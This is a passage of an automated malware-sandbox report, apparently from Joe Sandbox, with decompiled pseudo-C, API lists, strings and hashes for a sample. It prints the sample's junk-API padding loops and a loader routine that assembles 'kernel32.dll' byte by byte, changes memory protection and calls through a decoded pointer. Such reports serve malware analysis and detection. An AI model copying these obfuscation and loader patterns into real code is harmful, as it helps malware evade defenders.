                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID:
                        • API String ID: 2579439406-0
                        • Opcode ID: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
                        • Instruction ID: fe692e2c2471a191408ecafd0a3b7612e04458c4672b6b453b9975c369e636a9
                        • Opcode Fuzzy Hash: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
                        • Instruction Fuzzy Hash: 39210775A04244CFD720DFA7EE49A443BE0FB08310F90443AE50AA72B1DBB46986CF5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0040FBC1(void* __ebx, void* __ecx, void* __edi) {
                        				void* _t180;
                        				void* _t183;
                        				void* _t236;
                        
                        				_t236 = __edi;
                        				_t183 = __ecx;
                        				_t180 = __ebx;
                        				_push(cs);
                        			}






                        0x0040fbc1
                        0x0040fbc1
                        0x0040fbc1
                        0x0040fbc1

                        APIs
                        • RaiseException.KERNEL32(C0000091,00000000,?,?), ref: 0040FD9B
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 79006d2fe9c26dff72dc47bcb9a31a88823a34dc8838945c28cb2945f7c2870a
                        • Instruction ID: cae0dfbe6e4335d19a8148cd79cde4b968717617931abf2d66b64ead8208cd3c
                        • Opcode Fuzzy Hash: 79006d2fe9c26dff72dc47bcb9a31a88823a34dc8838945c28cb2945f7c2870a
                        • Instruction Fuzzy Hash: 3CA19B31110609CFD728CF18C496A657BA0FF44354F2586BEE99B9F2E1C738E995CB88
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040CC65() {
                        
                        				SetUnhandledExceptionFilter(E0040CC23);
                        				return 0;
                        			}



                        0x0040cc6a
                        0x0040cc72

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000CC23), ref: 0040CC6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 8a9668a121bb6271092156a840b57e56a2786df9fe65fee17d7729fe436932e7
                        • Instruction ID: 2ae0edce1fd270ac90234cf03210fdf1cd3bd5e5e37b8ca74bc146a0eddefa53
                        • Opcode Fuzzy Hash: 8a9668a121bb6271092156a840b57e56a2786df9fe65fee17d7729fe436932e7
                        • Instruction Fuzzy Hash: A69002706555818AE60017719D4D60535956A58B46F5509717049E44B8DE7840415519
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction ID: 20df88512b343b647615cb62515e99efdca8ba47d32269c00433d2079c688b67
                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                        • Instruction Fuzzy Hash: D3119E723411109FE714CE65EC95FA277EAFF89320B298055E908CB392D675E801C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E0040573C(void* __ecx, unsigned int __edx, intOrPtr _a4) {
                        				void* _v6;
                        				struct _COORD _v8;
                        				unsigned int _v12;
                        				long _v16;
                        				long _v20;
                        				struct _INPUT_RECORD _v40;
                        				char _v1064;
                        				short _v3112;
                        				short _v5160;
                        				void* _t15;
                        				void* _t16;
                        				void* _t37;
                        				unsigned int _t42;
                        
                        				_t15 = E00406B10(0x1424);
                        				_t42 = __edx >> 3;
                        				if(_t42 > 0) {
                        					_t37 = __ecx;
                        					_v12 = _t42;
                        					do {
                        						if( *0x42e644 == 0x5d) {
                        							GlobalGetAtomNameA(0,  &_v1064, 0);
                        							PeekConsoleInputW(0,  &_v40, 0,  &_v20);
                        							GetPrivateProfileStringW(0, 0, 0, 0, 0, 0);
                        							GetShortPathNameW(L"rawurumuxe",  &_v3112, 0);
                        							__imp__GetConsoleAliasA(0, 0, 0, 0);
                        							_v8.X = 0;
                        							asm("stosw");
                        							WriteConsoleOutputCharacterW(0, L"yetuzohapimupukugegisufaxinu", 0, _v8,  &_v16);
                        							VirtualAlloc(0, 0, 0, 0);
                        							SearchPathA("kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu", "lohulomazuvepupanezewevewimafof", 0, 0, 0, 0);
                        							DeleteFileW(0);
                        							LoadLibraryW(L"genibutozetinoyegazuzatozes");
                        							IsBadCodePtr(0);
                        							GetModuleFileNameW(0,  &_v5160, 0);
                        							EnumResourceTypesA(0, 0, 0);
                        						}
                        						_t16 = E00405599(_t37, _a4, 0);
                        						_t37 = _t37 + 8;
                        						_t12 =  &_v12;
                        						 *_t12 = _v12 - 1;
                        					} while ( *_t12 != 0);
                        					return _t16;
                        				}
                        				return _t15;
                        			}
















                        0x00405744
                        0x0040574a
                        0x00405751
                        0x00405759
                        0x0040575b
                        0x0040575e
                        0x00405765
                        0x00405774
                        0x00405784
                        0x00405790
                        0x004057a3
                        0x004057ad
                        0x004057b5
                        0x004057bc
                        0x004057cc
                        0x004057d6
                        0x004057ea
                        0x004057f1
                        0x004057fc
                        0x00405803
                        0x00405812
                        0x0040581b
                        0x0040581b
                        0x00405826
                        0x0040582b
                        0x0040582e
                        0x0040582e
                        0x0040582e
                        0x00000000
                        0x00405838
                        0x0040583b

                        APIs
                        • GlobalGetAtomNameA.KERNEL32 ref: 00405774
                        • PeekConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405784
                        • GetPrivateProfileStringW.KERNEL32 ref: 00405790
                        • GetShortPathNameW.KERNEL32 ref: 004057A3
                        • GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057AD
                        • WriteConsoleOutputCharacterW.KERNEL32(00000000,yetuzohapimupukugegisufaxinu,00000000,?,?), ref: 004057CC
                        • VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057D6
                        • SearchPathA.KERNEL32(kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu,lohulomazuvepupanezewevewimafof,00000000,00000000,00000000,00000000), ref: 004057EA
                        • DeleteFileW.KERNEL32(00000000), ref: 004057F1
                        • LoadLibraryW.KERNEL32(genibutozetinoyegazuzatozes), ref: 004057FC
                        • IsBadCodePtr.KERNEL32 ref: 00405803
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00405812
                        • EnumResourceTypesA.KERNEL32 ref: 0040581B
                        Strings
                        • yetuzohapimupukugegisufaxinu, xrefs: 004057C6
                        • lohulomazuvepupanezewevewimafof, xrefs: 004057E0
                        • kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu, xrefs: 004057E5
                        • rawurumuxe, xrefs: 0040579E
                        • genibutozetinoyegazuzatozes, xrefs: 004057F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ConsoleName$FilePath$AliasAllocAtomCharacterCodeDeleteEnumGlobalInputLibraryLoadModuleOutputPeekPrivateProfileResourceSearchShortStringTypesVirtualWrite
                        • String ID: genibutozetinoyegazuzatozes$kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu$lohulomazuvepupanezewevewimafof$rawurumuxe$yetuzohapimupukugegisufaxinu
                        • API String ID: 2519718940-461694913
                        • Opcode ID: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
                        • Instruction ID: b0c5818164c8b2c279455538c364471d95fd1b1af7f0e09314901615d566d303
                        • Opcode Fuzzy Hash: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
                        • Instruction Fuzzy Hash: 68212872502524BBC711AB919E48CDF7F7CEF4A3917004076F64AF1461C6385685CBB9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00409E0C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				struct HINSTANCE__* _t23;
                        				intOrPtr _t28;
                        				intOrPtr _t32;
                        				intOrPtr _t45;
                        				void* _t46;
                        
                        				_t35 = __ebx;
                        				_push(0xc);
                        				_push(0x417988);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t44 = L"KERNEL32.DLL";
                        				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                        				if(_t23 == 0) {
                        					_t23 = E0040CC73(_t44);
                        				}
                        				 *(_t46 - 0x1c) = _t23;
                        				_t45 =  *((intOrPtr*)(_t46 + 8));
                        				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402798;
                        				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                        				if(_t23 != 0) {
                        					_t35 = GetProcAddress;
                        					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                        					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                        				}
                        				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                        				 *((char*)(_t45 + 0xc8)) = 0x43;
                        				 *((char*)(_t45 + 0x14b)) = 0x43;
                        				 *(_t45 + 0x68) = 0x42cc70;
                        				E0040DB4D(_t35, 1, 0xd);
                        				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                        				InterlockedIncrement( *(_t45 + 0x68));
                        				 *(_t46 - 4) = 0xfffffffe;
                        				E00409EE1();
                        				E0040DB4D(_t35, 1, 0xc);
                        				 *(_t46 - 4) = 1;
                        				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                        				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                        				if(_t28 == 0) {
                        					_t32 =  *0x42d278; // 0x42d1a0
                        					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                        				}
                        				E0040F2F9( *((intOrPtr*)(_t45 + 0x6c)));
                        				 *(_t46 - 4) = 0xfffffffe;
                        				return E0040C16D(E00409EEA());
                        			}








                        0x00409e0c
                        0x00409e0c
                        0x00409e0e
                        0x00409e13
                        0x00409e18
                        0x00409e1e
                        0x00409e26
                        0x00409e29
                        0x00409e2e
                        0x00409e2f
                        0x00409e32
                        0x00409e35
                        0x00409e3f
                        0x00409e44
                        0x00409e4c
                        0x00409e54
                        0x00409e64
                        0x00409e64
                        0x00409e6a
                        0x00409e6d
                        0x00409e74
                        0x00409e7b
                        0x00409e84
                        0x00409e8a
                        0x00409e91
                        0x00409e97
                        0x00409e9e
                        0x00409ea5
                        0x00409eab
                        0x00409eae
                        0x00409eb1
                        0x00409eb6
                        0x00409eb8
                        0x00409ebd
                        0x00409ebd
                        0x00409ec3
                        0x00409ec9
                        0x00409eda

                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00417988,0000000C,00409F47,00000000,00000000), ref: 00409E1E
                        • __crt_waiting_on_module_handle.LIBCMT ref: 00409E29
                          • Part of subcall function 0040CC73: Sleep.KERNEL32(000003E8,00000000,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC7F
                          • Part of subcall function 0040CC73: GetModuleHandleW.KERNEL32(?,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC88
                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00409E52
                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409E62
                        • __lock.LIBCMT ref: 00409E84
                        • InterlockedIncrement.KERNEL32(0042CC70), ref: 00409E91
                        • __lock.LIBCMT ref: 00409EA5
                        • ___addlocaleref.LIBCMT ref: 00409EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                        • API String ID: 1028249917-2843748187
                        • Opcode ID: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
                        • Instruction ID: 6ad4f0a12971139d9532a4c3a171173a4d2e78e68cd5d816e784cf29c2ced9c8
                        • Opcode Fuzzy Hash: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
                        • Instruction Fuzzy Hash: FC116D71940701DAE720EF76D945B5ABBE0AF05314F10453EE499B62E1CB78A940CF5C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 0040563B
                        • WaitNamedPipeW.KERNEL32(luhovire,00000000), ref: 00405685
                        • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405695
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040569F
                        • OpenWaitableTimerA.KERNEL32(00000000,00000000,Camivanihaza dulaxow), ref: 004056AC
                        • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004056B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: CompareConsoleCreateEventExchangeInputInterlockedMountNamedOpenPipePointReadTimerVolumeWaitWaitable
                        • String ID: Camivanihaza dulaxow$luhovire
                        • API String ID: 3983037427-2293185549
                        • Opcode ID: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
                        • Instruction ID: e0417459ce5708b3d2944c1299cadaac4ca3c3044ba0b9f4daa45e8deca22c17
                        • Opcode Fuzzy Hash: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
                        • Instruction Fuzzy Hash: EA41C3B1E01219EFCB50CFA9DA899DEBBB4FF19314F50406AE515F2250D3349A41CFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E00406429(void* __eflags) {
                        				char _v2048;
                        				intOrPtr _t2;
                        				short _t4;
                        				short _t5;
                        				short _t7;
                        				short _t8;
                        				short _t9;
                        				short _t10;
                        				short _t11;
                        				short _t12;
                        				short _t13;
                        				short _t14;
                        				intOrPtr* _t21;
                        				void* _t24;
                        				void* _t32;
                        
                        				_t2 =  *0x41c7ac; // 0xfff5ca55
                        				 *0x42e644 = _t2;
                        				 *0x42e644 =  *0x42e644 + 0xb2d3b;
                        				_t4 = 0x6e;
                        				 *0x42dcde = _t4;
                        				_t5 = 0x33;
                        				 *0x42dce4 = _t5;
                        				 *0x42dcf0 = 0;
                        				_t7 = 0x2e;
                        				 *0x42dce8 = _t7;
                        				_t8 = 0x6b;
                        				 *0x42dcd8 = _t8;
                        				_t9 = 0x6c;
                        				 *0x42dcec = _t9;
                        				_t10 = 0x64;
                        				 *0x42dcea = _t10;
                        				_t11 = 0x6c;
                        				 *0x42dcee = _t11;
                        				 *0x42dce2 = _t11;
                        				_t12 = 0x32;
                        				 *0x42dce6 = _t12;
                        				_t13 = 0x65;
                        				 *0x42dcda = _t13;
                        				 *0x42dce0 = _t13;
                        				_t14 = 0x72;
                        				 *0x42dcdc = _t14;
                        				E00405A6B(_t32);
                        				_t24 = 0x184cc;
                        				do {
                        					if( *0x42e644 == 0x1833b) {
                        						__imp__GetVolumePathNameW(L"nulunowuyekufuneyaxesor",  &_v2048, 0);
                        						FindFirstChangeNotificationW(0, 0, 0);
                        						GetFileAttributesA(0);
                        						SetComputerNameA("Basiyixeyifopug saluzoha");
                        						__imp__SetCalendarInfoW(0, 0, 0, 0);
                        						GetFileType(0);
                        						__imp__SetFileShortNameW(0, 0);
                        					}
                        					_t24 = _t24 - 1;
                        				} while (_t24 != 0);
                        				_t21 =  *0x42dc24; // 0x62f9dc
                        				 *0x42dccc = _t21;
                        				 *_t21();
                        				return 0;
                        			}


















                        0x00406429
                        0x00406436
                        0x00406440
                        0x00406448
                        0x0040644b
                        0x00406451
                        0x00406454
                        0x0040645c
                        0x00406462
                        0x00406465
                        0x0040646b
                        0x0040646e
                        0x00406474
                        0x00406477
                        0x0040647d
                        0x00406480
                        0x00406486
                        0x00406489
                        0x0040648f
                        0x00406495
                        0x00406498
                        0x0040649e
                        0x004064a1
                        0x004064a7
                        0x004064ad
                        0x004064ae
                        0x004064b4
                        0x004064b9
                        0x004064c0
                        0x004064ca
                        0x004064d7
                        0x004064e0
                        0x004064e7
                        0x004064f2
                        0x004064fc
                        0x00406503
                        0x0040650b
                        0x0040650b
                        0x00406511
                        0x00406511
                        0x00406514
                        0x00406519
                        0x0040651e
                        0x0040652a

                        APIs
                          • Part of subcall function 00405A6B: __EH_prolog.LIBCMT ref: 00405A74
                          • Part of subcall function 00405A6B: GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
                          • Part of subcall function 00405A6B: VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
                          • Part of subcall function 00405A6B: GetLastError.KERNEL32 ref: 00405AB8
                        • GetVolumePathNameW.KERNEL32(nulunowuyekufuneyaxesor,00000000,00000000), ref: 004064D7
                        • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004064E0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004064E7
                        • SetComputerNameA.KERNEL32(Basiyixeyifopug saluzoha), ref: 004064F2
                        • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004064FC
                        • GetFileType.KERNEL32(00000000), ref: 00406503
                        • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040650B
                        Strings
                        • Basiyixeyifopug saluzoha, xrefs: 004064ED
                        • nulunowuyekufuneyaxesor, xrefs: 004064D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: FileName$AllocAttributesCalendarChangeComputerErrorFindFirstGlobalH_prologInfoLastNotificationPathProtectShortTypeVirtualVolume
                        • String ID: Basiyixeyifopug saluzoha$nulunowuyekufuneyaxesor
                        • API String ID: 164344972-2523395033
                        • Opcode ID: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
                        • Instruction ID: fb966b0e15d71144b0bd22afb04916c9cf462eaa64a8b83c211263f238221873
                        • Opcode Fuzzy Hash: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
                        • Instruction Fuzzy Hash: A2218E76B55280AAE330CBA2FD09AA63768FF54B20F504437F545D61B0DBB50582CB6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E0040A5A2(intOrPtr __ecx) {
                        				void* _t47;
                        				intOrPtr _t48;
                        				void* _t53;
                        				void* _t54;
                        				void* _t56;
                        				intOrPtr _t57;
                        				void* _t58;
                        				void* _t61;
                        
                        				_push(0x2c);
                        				_push(0x417a78);
                        				E0040C128(_t47, _t54, _t56);
                        				_t48 = __ecx;
                        				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                        				_t57 =  *((intOrPtr*)(_t58 + 8));
                        				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                        				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                        				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                        				 *((intOrPtr*)(_t58 - 0x28)) = E00407063(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                        				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409F6C(__ecx, _t53, _t61) + 0x88));
                        				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c));
                        				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x88)) = _t57;
                        				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                        				 *(_t58 - 4) = 1;
                        				 *((intOrPtr*)(_t58 - 0x1c)) = E00407108(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                        				 *(_t58 - 4) = 0xfffffffe;
                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                        				E0040A6C8(_t48, _t53, _t55, _t57, _t61);
                        				return E0040C16D( *((intOrPtr*)(_t58 - 0x1c)));
                        			}











                        0x0040a5a2
                        0x0040a5a4
                        0x0040a5a9
                        0x0040a5ae
                        0x0040a5b0
                        0x0040a5b3
                        0x0040a5b6
                        0x0040a5b9
                        0x0040a5c0
                        0x0040a5d1
                        0x0040a5df
                        0x0040a5ed
                        0x0040a5f5
                        0x0040a603
                        0x0040a609
                        0x0040a610
                        0x0040a613
                        0x0040a629
                        0x0040a62c
                        0x0040a6a1
                        0x0040a6a8
                        0x0040a6af
                        0x0040a6bc

                        APIs
                        • __CreateFrameInfo.LIBCMT ref: 0040A5CA
                          • Part of subcall function 00407063: __getptd.LIBCMT ref: 00407071
                          • Part of subcall function 00407063: __getptd.LIBCMT ref: 0040707F
                        • __getptd.LIBCMT ref: 0040A5D4
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A5E2
                        • __getptd.LIBCMT ref: 0040A5F0
                        • __getptd.LIBCMT ref: 0040A5FB
                        • _CallCatchBlock2.LIBCMT ref: 0040A621
                          • Part of subcall function 00407108: __CallSettingFrame@12.LIBCMT ref: 00407154
                          • Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6D7
                          • Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                        • String ID:
                        • API String ID: 1602911419-0
                        • Opcode ID: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
                        • Instruction ID: 7e684faa2fd1f334b094959b8f169ed2d54e211e7372e57f7a86f5eb42b7bb83
                        • Opcode Fuzzy Hash: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
                        • Instruction Fuzzy Hash: 4E110AB1C00309DFDF00EFA5D845AAD77B0FF08314F10856AF894AB292DB399A119F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E00406B56(char _a4) {
                        				signed int _v16;
                        				char _v20;
                        				long _v24;
                        				signed int _v32;
                        				void* _v36;
                        				long _v40;
                        				void _v60;
                        				void* __edi;
                        				void* _t20;
                        				signed int _t21;
                        				signed int _t26;
                        				DWORD* _t27;
                        				void* _t30;
                        				signed int _t34;
                        				void* _t38;
                        
                        				while(1) {
                        					_t2 =  &_a4; // 0x405855
                        					_t20 = E004078D7(_t30, _t38,  *_t2);
                        					if(_t20 != 0) {
                        						break;
                        					}
                        					_t21 = E00409C75(_a4);
                        					__eflags = _t21;
                        					if(_t21 == 0) {
                        						__eflags =  *0x42e660 & 0x00000001;
                        						if(( *0x42e660 & 0x00000001) == 0) {
                        							 *0x42e660 =  *0x42e660 | 0x00000001;
                        							__eflags =  *0x42e660;
                        							E00406B3B(0x42e654);
                        							E00409C4F( *0x42e660, 0x417703);
                        						}
                        						E0040588A( &_v16, 0x42e654);
                        						_push(0x4177a0);
                        						_push( &_v16);
                        						L7();
                        						asm("int3");
                        						_push(0x42e654);
                        						_push(_t38);
                        						_t34 = 8;
                        						_v36 = memcpy( &_v60, 0x401518, _t34 << 2);
                        						_t26 = _v16;
                        						_v32 = _t26;
                        						__eflags = _t26;
                        						if(_t26 != 0) {
                        							__eflags =  *_t26 & 0x00000008;
                        							if(( *_t26 & 0x00000008) != 0) {
                        								_v20 = 0x1994000;
                        							}
                        						}
                        						_t27 =  &_v20;
                        						RaiseException(_v40, _v36, _v24, _t27);
                        						return _t27;
                        					} else {
                        						continue;
                        					}
                        					L11:
                        				}
                        				return _t20;
                        				goto L11;
                        			}


















                        0x00406b6d
                        0x00406b6d
                        0x00406b70
                        0x00406b78
                        0x00000000
                        0x00000000
                        0x00406b63
                        0x00406b69
                        0x00406b6b
                        0x00406b7c
                        0x00406b88
                        0x00406b8a
                        0x00406b8a
                        0x00406b93
                        0x00406b9d
                        0x00406ba2
                        0x00406ba7
                        0x00406bac
                        0x00406bb4
                        0x00406bb5
                        0x00406bba
                        0x00406bc6
                        0x00406bc7
                        0x00406bca
                        0x00406bd5
                        0x00406bd8
                        0x00406bdc
                        0x00406be0
                        0x00406be2
                        0x00406be4
                        0x00406be7
                        0x00406be9
                        0x00406be9
                        0x00406be7
                        0x00406bf0
                        0x00406bfd
                        0x00406c04
                        0x00000000
                        0x00000000
